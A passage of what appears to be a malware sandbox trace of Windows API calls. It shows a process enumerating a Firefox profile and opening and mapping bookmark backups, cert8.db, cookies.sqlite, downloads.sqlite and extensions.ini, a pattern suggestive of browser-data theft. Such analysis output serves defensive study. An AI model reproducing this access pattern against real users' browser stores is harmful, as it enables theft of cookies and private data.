(lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.438] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.438] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0590.438] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.438] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.439] CloseHandle (hObject=0x4e0) returned 1 [0590.439] CloseHandle (hObject=0x66c) returned 1 [0590.439] LocalFree (hMem=0x63fa40) returned 0x0 [0590.439] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.439] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.439] lstrlenW (lpString="\\") returned 1 [0590.439] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.439] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed99a8 [0590.439] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0590.439] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.439] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.439] LocalFree (hMem=0x2ed99a8) returned 0x0 [0590.439] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.439] CloseHandle (hObject=0x66c) returned 1 [0590.439] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.439] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63fa40 [0590.439] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x63fa40, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0590.439] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.439] CloseHandle (hObject=0x66c) returned 1 [0590.439] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.439] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.439] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0590.439] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.440] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.440] CloseHandle (hObject=0x4e0) returned 1 [0590.440] CloseHandle (hObject=0x66c) returned 1 [0590.440] LocalFree (hMem=0x63fa40) returned 0x0 [0590.440] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.440] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0 [0590.440] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.440] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.440] LocalFree (hMem=0x56cab0) returned 0x0 [0590.440] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.440] lstrlenW (lpString="\\") returned 1 [0590.440] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.440] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.440] lstrlenW (lpString="cert8.db") returned 8 [0590.440] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.440] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.440] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.440] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.440] CloseHandle (hObject=0x668) returned 1 [0590.440] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.440] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.440] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0590.440] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.440] CloseHandle (hObject=0x668) returned 1 [0590.440] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.440] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.440] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.441] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.441] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.441] CloseHandle (hObject=0x66c) returned 1 [0590.442] CloseHandle (hObject=0x668) returned 1 [0590.442] LocalFree (hMem=0x63bd28) returned 0x0 [0590.442] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.442] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.442] lstrlenW (lpString="\\") returned 1 [0590.442] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.442] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.442] lstrlenW (lpString="compatibility.ini") returned 17 [0590.442] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.442] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.442] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.442] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.442] CloseHandle (hObject=0x668) returned 1 [0590.442] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.442] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.442] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x2ed9860, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0590.442] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.442] CloseHandle (hObject=0x668) returned 1 [0590.442] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.442] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0590.442] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.442] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.442] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.443] CloseHandle (hObject=0x66c) returned 1 [0590.443] CloseHandle (hObject=0x668) returned 1 [0590.443] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.443] LocalFree (hMem=0x56cab0) returned 0x0 [0590.443] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.443] lstrlenW (lpString="\\") returned 1 [0590.443] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.443] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.443] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0590.443] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.443] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.443] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.443] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.443] CloseHandle (hObject=0x668) returned 1 [0590.443] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.443] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63fa18 [0590.443] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x63fa18, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0590.443] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.443] CloseHandle (hObject=0x668) returned 1 [0590.443] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.443] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0590.443] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.443] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.444] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.446] CloseHandle (hObject=0x66c) returned 1 [0590.446] CloseHandle (hObject=0x668) returned 1 [0590.446] LocalFree (hMem=0x63fa18) returned 0x0 [0590.446] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.446] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.446] lstrlenW (lpString="\\") returned 1 [0590.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.446] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.446] lstrlenW (lpString="cookies.sqlite") returned 14 [0590.446] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.446] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.446] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.446] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.446] CloseHandle (hObject=0x668) returned 1 [0590.446] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.446] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.446] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0590.446] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.446] CloseHandle (hObject=0x668) returned 1 [0590.446] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.446] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0590.446] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.446] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.449] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.451] CloseHandle (hObject=0x66c) returned 1 [0590.451] CloseHandle (hObject=0x668) returned 1 [0590.451] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.451] LocalFree (hMem=0x56cab0) returned 0x0 [0590.451] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.451] lstrlenW (lpString="\\") returned 1 [0590.451] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.451] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.451] lstrlenW (lpString="downloads.sqlite") returned 16 [0590.451] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.451] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.451] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.451] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.452] CloseHandle (hObject=0x668) returned 1 [0590.452] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.452] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.452] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x2ed9860, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0590.452] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.452] CloseHandle (hObject=0x668) returned 1 [0590.452] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.452] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.452] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.452] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.452] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.453] CloseHandle (hObject=0x66c) returned 1 [0590.453] CloseHandle (hObject=0x668) returned 1 [0590.453] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.453] LocalFree (hMem=0x56cab0) returned 0x0 [0590.453] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.453] lstrlenW (lpString="\\") returned 1 [0590.453] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.453] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.453] lstrlenW (lpString="extensions.ini") returned 14 [0590.453] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.453] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.453] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.453] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.453] CloseHandle (hObject=0x668) returned 1 [0590.453] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.453] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.453] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0590.454] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.454] CloseHandle (hObject=0x668) returned 1 [0590.454] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.454] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0590.454] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.454] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.454] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.454] CloseHandle (hObject=0x66c) returned 1 [0590.454] CloseHandle (hObject=0x668) returned 1 [0590.454] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.454] LocalFree (hMem=0x56cab0) returned 0x0 [0590.454] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.454] lstrlenW (lpString="\\") returned 1 [0590.454] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") 